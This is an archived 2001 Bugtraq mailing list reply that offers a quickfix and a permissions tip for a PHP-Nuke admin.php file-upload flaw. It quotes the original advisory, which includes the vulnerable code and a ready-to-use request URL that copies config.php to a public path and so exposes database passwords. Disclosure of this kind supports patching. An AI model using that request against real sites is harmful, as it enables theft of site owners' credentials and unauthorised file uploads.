Bugtraq mailing list archives
Re: twlc advisory: all versions of php nuke are vulnerable...
From: "Magnus Skjegstad" <magnus () skjegstad com>
Date: Tue, 25 Sep 2001 06:41:14 +0200
Alternative "quickfix"; change "if($upload) {" to "if (($upload) && ($admintest)) {" This at least works for PostNuke 0.62. I have not tested the latest PostNuke 0.63 - it may be vulnerable as well... And btw; if you're not going to use the filemanager, disallow write access for the webuser (usually nobody or www) to all files/directories below webroot. Magnus Skjegstad ----- Original Message ----- From: <supergate () twlc net> To: "bugtraq" <bugtraq () securityfocus com> Sent: Monday, September 24, 2001 9:31 PM Subject: twlc advisory: all versions of php nuke are vulnerable...
Explanation Do you need sql password? http://www.server.net/admin.php?upload=1&file=config.php&file_name=hacked.tx t&wdir=/images/&userfile=config.php&userfile_name=hacked.txt the admin 'login' page will be prompted just go to http://www.server.net/images/hacked.txt and you will see config.php that as everyone knows contain the sql's passwords, you can even upload files...i leave you the 'fun' to find all the ways to use it... and try to dont be a SCRIPT KIDDIE we wrote this advisory to help who runs php nuke and NOT TO LET YOU HAVE FUN. let me explain you the bug... admin.php contains this routine: $basedir = dirname($SCRIPT_FILENAME); $textrows = 20; $textcols = 85; $udir = dirname($PHP_SELF); if(!$wdir) $wdir="/"; if($cancel) $op="FileManager"; if($upload) { copy($userfile,$basedir.$wdir.$userfile_name); $lastaction = ""._UPLOADED." $userfile_name --> $wdir"; // This need a rewrite -------------------------------------> OMG! WE AGREEEEEEEE lmao //include("header.php"); //GraphicAdmin($hlpfile); //html_header(); //displaydir(); $wdir2="/"; chdir($basedir . $wdir2); //CloseTable(); //include("footer.php"); Header("Location: admin.php?op=FileManager"); exit; }
Current thread:
- twlc advisory: all versions of php nuke are vulnerable... supergate (Sep 24)
- Re: twlc advisory: all versions of php nuke are vulnerable... Magnus Skjegstad (Sep 24)
- Re: twlc advisory: all versions of php nuke are vulnerable... Paul Starzetz (Sep 25)
- <Possible follow-ups>
- Re: twlc advisory: all versions of php nuke are vulnerable... Magnus Skjegstad (Sep 25)